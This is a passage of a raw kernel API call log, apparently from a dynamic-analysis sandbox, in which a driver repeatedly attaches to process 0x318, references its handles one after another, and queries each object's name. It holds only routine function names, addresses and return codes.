ObfDereferenceObject (Object=0xffffc001493c2e50) returned 0x8000 [0264.905] IoCompleteRequest () returned 0x0 [0264.905] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.905] PsAcquireProcessExitSynchronization () returned 0x0 [0264.905] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.905] ObReferenceObjectByHandle (in: Handle=0x133c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069973440, HandleInformation=0x0) returned 0x0 [0264.905] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.905] PsReleaseProcessExitSynchronization () returned 0x2 [0264.905] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801f3 [0264.905] ObQueryNameString (in: Object=0xffffe00069973440, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.905] ObfDereferenceObject (Object=0xffffe00069973440) returned 0x7ffe [0264.905] IoCompleteRequest () returned 0x0 [0264.905] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.905] PsAcquireProcessExitSynchronization () returned 0x0 [0264.905] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.905] ObReferenceObjectByHandle (in: Handle=0x1360, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069ffac90, HandleInformation=0x0) returned 0x0 [0264.905] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.905] PsReleaseProcessExitSynchronization () returned 0x2 [0264.905] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801f2 [0264.905] ObQueryNameString (in: Object=0xffffe00069ffac90, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.905] ObfDereferenceObject (Object=0xffffe00069ffac90) returned 0x7ff5 [0264.905] IoCompleteRequest () returned 0x0 [0264.905] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.905] PsAcquireProcessExitSynchronization () returned 0x0 [0264.905] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.905] ObReferenceObjectByHandle (in: Handle=0x1390, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007ff73920, HandleInformation=0x0) returned 0x0 [0264.905] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.905] PsReleaseProcessExitSynchronization () returned 0x2 [0264.905] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801f1 [0264.905] ObQueryNameString (in: Object=0xffffe0007ff73920, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.906] ObfDereferenceObject (Object=0xffffe0007ff73920) returned 0x7ffc [0264.906] IoCompleteRequest () returned 0x0 [0264.906] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.906] PsAcquireProcessExitSynchronization () returned 0x0 [0264.906] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.906] ObReferenceObjectByHandle (in: Handle=0x13a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069feccb0, HandleInformation=0x0) returned 0x0 [0264.906] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.906] PsReleaseProcessExitSynchronization () returned 0x2 [0264.906] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801f0 [0264.906] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.906] ObfDereferenceObject (Object=0xffffe00069feccb0) returned 0x8001 [0264.906] IoCompleteRequest () returned 0x0 [0264.906] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.906] PsAcquireProcessExitSynchronization () returned 0x0 [0264.906] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.906] ObReferenceObjectByHandle (in: Handle=0x13b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069fef090, HandleInformation=0x0) returned 0x0 [0264.906] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.906] PsReleaseProcessExitSynchronization () returned 0x2 [0264.906] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801ef [0264.906] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.906] ObfDereferenceObject (Object=0xffffe00069fef090) returned 0x8000 [0264.906] IoCompleteRequest () returned 0x0 [0264.906] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.906] PsAcquireProcessExitSynchronization () returned 0x0 [0264.906] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.906] ObReferenceObjectByHandle (in: Handle=0x13c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b93c80, HandleInformation=0x0) returned 0x0 [0264.906] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.906] PsReleaseProcessExitSynchronization () returned 0x2 [0264.906] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801ee [0264.906] ObQueryNameString (in: Object=0xffffe00069b93c80, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.906] ObfDereferenceObject (Object=0xffffe00069b93c80) returned 0x7fff [0264.906] IoCompleteRequest () returned 0x0 [0264.906] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.906] PsAcquireProcessExitSynchronization () returned 0x0 [0264.906] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.906] ObReferenceObjectByHandle (in: Handle=0x1414, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a309c40, HandleInformation=0x0) returned 0x0 [0264.906] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.906] PsReleaseProcessExitSynchronization () returned 0x2 [0264.906] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801ed [0264.906] ObQueryNameString (in: Object=0xffffe0006a309c40, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.906] ObfDereferenceObject (Object=0xffffe0006a309c40) returned 0x7fff [0264.906] IoCompleteRequest () returned 0x0 [0264.906] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.907] PsAcquireProcessExitSynchronization () returned 0x0 [0264.907] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.907] ObReferenceObjectByHandle (in: Handle=0x143c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069fd51c0, HandleInformation=0x0) returned 0x0 [0264.907] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.907] PsReleaseProcessExitSynchronization () returned 0x2 [0264.907] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801ec [0264.907] ObQueryNameString (in: Object=0xffffe00069fd51c0, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.907] ObfDereferenceObject (Object=0xffffe00069fd51c0) returned 0x7fdf [0264.907] IoCompleteRequest () returned 0x0 [0264.907] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.907] PsAcquireProcessExitSynchronization () returned 0x0 [0264.907] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.907] ObReferenceObjectByHandle (in: Handle=0x1454, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069af5540, HandleInformation=0x0) returned 0x0 [0264.907] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.907] PsReleaseProcessExitSynchronization () returned 0x2 [0264.907] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801eb [0264.907] ObQueryNameString (in: Object=0xffffe00069af5540, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.907] ObfDereferenceObject (Object=0xffffe00069af5540) returned 0x7ff2 [0264.907] IoCompleteRequest () returned 0x0 [0264.907] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.907] PsAcquireProcessExitSynchronization () returned 0x0 [0264.907] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.907] ObReferenceObjectByHandle (in: Handle=0x14bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006981f510, HandleInformation=0x0) returned 0x0 [0264.907] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.907] PsReleaseProcessExitSynchronization () returned 0x2 [0264.907] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801ea [0264.907] ObQueryNameString (in: Object=0xffffe0006981f510, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.907] ObfDereferenceObject (Object=0xffffe0006981f510) returned 0x7fff [0264.907] IoCompleteRequest () returned 0x0 [0264.907] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.907] PsAcquireProcessExitSynchronization () returned 0x0 [0264.907] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.907] ObReferenceObjectByHandle (in: Handle=0x1514, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a394270, HandleInformation=0x0) returned 0x0 [0264.907] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.907] PsReleaseProcessExitSynchronization () returned 0x2 [0264.907] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801e9 [0264.907] ObQueryNameString (in: Object=0xffffe0006a394270, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.907] ObfDereferenceObject (Object=0xffffe0006a394270) returned 0x800f [0264.907] IoCompleteRequest () returned 0x0 [0264.907] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.907] PsAcquireProcessExitSynchronization () returned 0x0 [0264.907] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.907] ObReferenceObjectByHandle (in: Handle=0x1534, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069247ba0, HandleInformation=0x0) returned 0x0 [0264.907] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.908] PsReleaseProcessExitSynchronization () returned 0x2 [0264.908] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801e8 [0264.908] ObQueryNameString (in: Object=0xffffe00069247ba0, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.908] ObfDereferenceObject (Object=0xffffe00069247ba0) returned 0x7ffe [0264.908] IoCompleteRequest () returned 0x0 [0264.908] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.908] PsAcquireProcessExitSynchronization () returned 0x0 [0264.908] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.908] ObReferenceObjectByHandle (in: Handle=0x1594, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a0a5090, HandleInformation=0x0) returned 0x0 [0264.908] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.908] PsReleaseProcessExitSynchronization () returned 0x2 [0264.908] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801e7 [0264.908] ObQueryNameString (in: Object=0xffffe0006a0a5090, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0xc00000bb [0264.908] ObfDereferenceObject (Object=0xffffe0006a0a5090) returned 0x7f55 [0264.908] IoCompleteRequest () returned 0x0 [0264.908] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.908] PsAcquireProcessExitSynchronization () returned 0x0 [0264.908] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.908] ObReferenceObjectByHandle (in: Handle=0x15cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069f3eae0, HandleInformation=0x0) returned 0x0 [0264.908] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.908] PsReleaseProcessExitSynchronization () returned 0x2 [0264.908] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801e6 [0264.908] ObQueryNameString (in: Object=0xffffe00069f3eae0, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.908] ObfDereferenceObject (Object=0xffffe00069f3eae0) returned 0x7ffb [0264.908] IoCompleteRequest () returned 0x0 [0264.908] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.908] PsAcquireProcessExitSynchronization () returned 0x0 [0264.908] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.908] ObReferenceObjectByHandle (in: Handle=0x163c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069909d30, HandleInformation=0x0) returned 0x0 [0264.908] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.908] PsReleaseProcessExitSynchronization () returned 0x2 [0264.908] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801e5 [0264.908] ObQueryNameString (in: Object=0xffffe00069909d30, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.908] ObfDereferenceObject (Object=0xffffe00069909d30) returned 0x7ffe [0264.908] IoCompleteRequest () returned 0x0 [0264.908] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.908] PsAcquireProcessExitSynchronization () returned 0x0 [0264.908] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.908] ObReferenceObjectByHandle (in: Handle=0x1668, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007e9923a0, HandleInformation=0x0) returned 0x0 [0264.908] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.908] PsReleaseProcessExitSynchronization () returned 0x2 [0264.908] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801e4 [0264.908] ObQueryNameString (in: Object=0xffffe0007e9923a0, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.908] ObfDereferenceObject (Object=0xffffe0007e9923a0) returned 0x7ffa [0264.909] IoCompleteRequest () returned 0x0 [0264.909] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.909] PsAcquireProcessExitSynchronization () returned 0x0 [0264.909] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.909] ObReferenceObjectByHandle (in: Handle=0x1670, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a495ae0, HandleInformation=0x0) returned 0x0 [0264.909] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.909] PsReleaseProcessExitSynchronization () returned 0x2 [0264.909] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801e3 [0264.909] ObQueryNameString (in: Object=0xffffc0014a495ae0, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.909] ObfDereferenceObject (Object=0xffffc0014a495ae0) returned 0x7fff [0264.909] IoCompleteRequest () returned 0x0 [0264.909] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.909] PsAcquireProcessExitSynchronization () returned 0x0 [0264.909] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.909] ObReferenceObjectByHandle (in: Handle=0x16a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a495080, HandleInformation=0x0) returned 0x0 [0264.909] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.909] PsReleaseProcessExitSynchronization () returned 0x2 [0264.909] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801e2 [0264.909] ObQueryNameString (in: Object=0xffffc0014a495080, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.909] ObfDereferenceObject (Object=0xffffc0014a495080) returned 0x7fff [0264.909] IoCompleteRequest () returned 0x0 [0264.909] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.909] PsAcquireProcessExitSynchronization () returned 0x0 [0264.909] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.909] ObReferenceObjectByHandle (in: Handle=0x16f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149873b00, HandleInformation=0x0) returned 0x0 [0264.909] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.909] PsReleaseProcessExitSynchronization () returned 0x2 [0264.909] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801e1 [0264.909] ObQueryNameString (in: Object=0xffffc00149873b00, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.909] ObfDereferenceObject (Object=0xffffc00149873b00) returned 0x7eed [0264.909] IoCompleteRequest () returned 0x0 [0264.909] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.909] PsAcquireProcessExitSynchronization () returned 0x0 [0264.909] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.909] ObReferenceObjectByHandle (in: Handle=0x16fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006978bdb0, HandleInformation=0x0) returned 0x0 [0264.909] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.909] PsReleaseProcessExitSynchronization () returned 0x2 [0264.909] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801e0 [0264.909] ObQueryNameString (in: Object=0xffffe0006978bdb0, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.909] ObfDereferenceObject (Object=0xffffe0006978bdb0) returned 0x7fdd [0264.909] IoCompleteRequest () returned 0x0 [0264.909] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.909] PsAcquireProcessExitSynchronization () returned 0x0 [0264.909] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.910] ObReferenceObjectByHandle (in: Handle=0x174c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bebf20, HandleInformation=0x0) returned 0x0 [0264.910] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.910] PsReleaseProcessExitSynchronization () returned 0x2 [0264.910] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801df [0264.910] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.910] ObfDereferenceObject (Object=0xffffe00069bebf20) returned 0x7ffd [0264.910] IoCompleteRequest () returned 0x0 [0264.910] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.910] PsAcquireProcessExitSynchronization () returned 0x0 [0264.910] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.910] ObReferenceObjectByHandle (in: Handle=0x1754, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069f52590, HandleInformation=0x0) returned 0x0 [0264.910] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.910] PsReleaseProcessExitSynchronization () returned 0x2 [0264.910] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801de [0264.910] ObQueryNameString (in: Object=0xffffe00069f52590, ObjectNameInfo=0xffffe0006a3a0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3a0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.910] ObfDereferenceObject (Object=0xffffe00069f52590) returned 0x7fff [0264.910] IoCompleteRequest () returned 0x0 [0264.910] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.910] PsAcquireProcessExitSynchronization () returned 0x0 [0264.910] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.910] ObReferenceObjectByHandle (in: Handle=0x176c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a3c1e20, HandleInformation=0x0) returned 0x0 [0264.910] ObfDereferenceObject (Object=0xffffe0006a3c1e20) returned 0x7ffc [0264.910] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.910] PsReleaseProcessExitSynchronization () returned 0x2 [0264.910] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801dd [0264.910] IoCompleteRequest () returned 0x0 [0264.910] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.910] PsAcquireProcessExitSynchronization () returned 0x0 [0264.910] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.910] ObReferenceObjectByHandle (in: Handle=0x17cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a269a80, HandleInformation=0x0) returned 0x0 [0264.910] ObfDereferenceObject 